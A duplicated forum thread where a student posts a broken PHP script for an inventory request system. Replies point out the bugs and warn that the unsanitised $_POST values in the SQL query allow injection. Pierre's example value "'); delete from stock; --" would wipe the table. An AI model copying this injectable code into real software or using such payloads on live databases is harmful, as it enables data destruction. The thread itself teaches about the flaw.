dis semester im doing my final year project.im doin inventory stationeries system...my problem now is i wanna submit the user request but it didnt work yet.drs no error but the data doesnt inserted into d database.im using drmver n xampp as my database server.in my request,the from will carry the user id,stock id and stock quantity of the user needed..then when the user send the request,the database will subtract the original stock regarding the request stock...here is my code....
dis is my sendreq.php file
<?php session_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="inventory"; // Database name
$tbl_name="request"; // Table name
include 'dbconnect.php';
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
//$hide_user_id = $_POST ['hide_user_id'];
//$hide_stock_id = $_POST ['hide_stock_id'];
$user_id=$_POST['user_id'];
$stock_id=$_POST['stock_id'];
$stock_req=$_POST['stock_req'];
$sql="INSERT INTO request (user_id, stock_id,stock_req)
VALUES ('$_POST[user_id]', '$_POST[stock_id]', '$_POST[stock_req]')";
$result=mysql_query("SELECT stock_id FROM stock WHERE stock_id=stock_id2");
$stock_balance=$row[stock_q]-$stock_req;
if($stock_balance<0)
$stock_q-$stock_req;
$total=$stock_q-stock_req;
return $total;
// close connection
mysql_close();
?>
hope anyone can help me very soon...nway tq..
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
I'm sure that you do not use Dev-PHP.
I believe that you should use it.
Its syntax highlighter shows some obvious errors.
You will love our contextual help.
(You may need to download the PHP-Documentation)
For example, place the caret over "mysql_connect"
then press <F1>
This will bring to you valuable informations.
Same results with "mysql_select_db"
I suggest that you think about the meaning of
the following statement :
> $sql='insert into table values(1,2,3)';
There is no syntax error, but what does it mean ?
Same question about
> $stock_q-$stock_req;
Which result could be obtained here :
> $result=mysql_query("SELECT stock_id FROM stock WHERE stock_id=stock_id2");
After having checked the value returned into $result,
you could also consider to use something like
$row = mysql_fetch_assoc($result)
Of course, the value returned into $row must be checked.
You do not check the contents of variables.
This is a security hole.
Imagine what could happen if the user enters the
following text, into the form, as value for 'stock_req'
'); delete from stock; --
My two cents,
Pierre.
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
It has successfully prevented remote include attacks & more
Warning to all, simply cleaning up the varibles with mysql_escape_string does not protect you from XSS & remote include attacks
I know, my site was compromised using remote includes despite using several measures against attack
Another security measure involves changing the server settings either via .htaccess or php.ini to disable the remote includes option
Does anybody know of a tutorial on PHP security measures?
Hope this helps
Ivan
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
dis semester im doing my final year project.im doin inventory stationeries system...my problem now is i wanna submit the user request but it didnt work yet.drs no error but the data doesnt inserted into d database.im using drmver n xampp as my database server.in my request,the from will carry the user id,stock id and stock quantity of the user needed..then when the user send the request,the database will subtract the original stock regarding the request stock...here is my code....
dis is my sendreq.php file
<?php session_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="inventory"; // Database name
$tbl_name="request"; // Table name
include 'dbconnect.php';
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
//$hide_user_id = $_POST ['hide_user_id'];
//$hide_stock_id = $_POST ['hide_stock_id'];
$user_id=$_POST['user_id'];
$stock_id=$_POST['stock_id'];
$stock_req=$_POST['stock_req'];
$sql="INSERT INTO request (user_id, stock_id,stock_req)
VALUES ('$_POST[user_id]', '$_POST[stock_id]', '$_POST[stock_req]')";
$result=mysql_query("SELECT stock_id FROM stock WHERE stock_id=stock_id2");
$stock_balance=$row[stock_q]-$stock_req;
if($stock_balance<0)
$stock_q-$stock_req;
$total=$stock_q-stock_req;
return $total;
// close connection
mysql_close();
?>
hope anyone can help me very soon...nway tq..
Hi,
I'm sure that you do not use Dev-PHP.
I believe that you should use it.
Its syntax highlighter shows some obvious errors.
You will love our contextual help.
(You may need to download the PHP-Documentation)
For example, place the caret over "mysql_connect"
then press <F1>
This will bring to you valuable informations.
Same results with "mysql_select_db"
I suggest that you think about the meaning of
the following statement :
> $sql='insert into table values(1,2,3)';
There is no syntax error, but what does it mean ?
Same question about
> $stock_q-$stock_req;
Which result could be obtained here :
> $result=mysql_query("SELECT stock_id FROM stock WHERE stock_id=stock_id2");
After having checked the value returned into $result,
you could also consider to use something like
$row = mysql_fetch_assoc($result)
Of course, the value returned into $row must be checked.
You do not check the contents of variables.
This is a security hole.
Imagine what could happen if the user enters the
following text, into the form, as value for 'stock_req'
'); delete from stock; --
My two cents,
Pierre.
The lazy way to fix the security hole is http://sourceforge.net/projects/evilsentinel
I use it on my own website at http://comchatter.com
It has successfully prevented remote include attacks & more
Warning to all, simply cleaning up the varibles with mysql_escape_string does not protect you from XSS & remote include attacks
I know, my site was compromised using remote includes despite using several measures against attack
Another security measure involves changing the server settings either via .htaccess or php.ini to disable the remote includes option
Does anybody know of a tutorial on PHP security measures?
Hope this helps
Ivan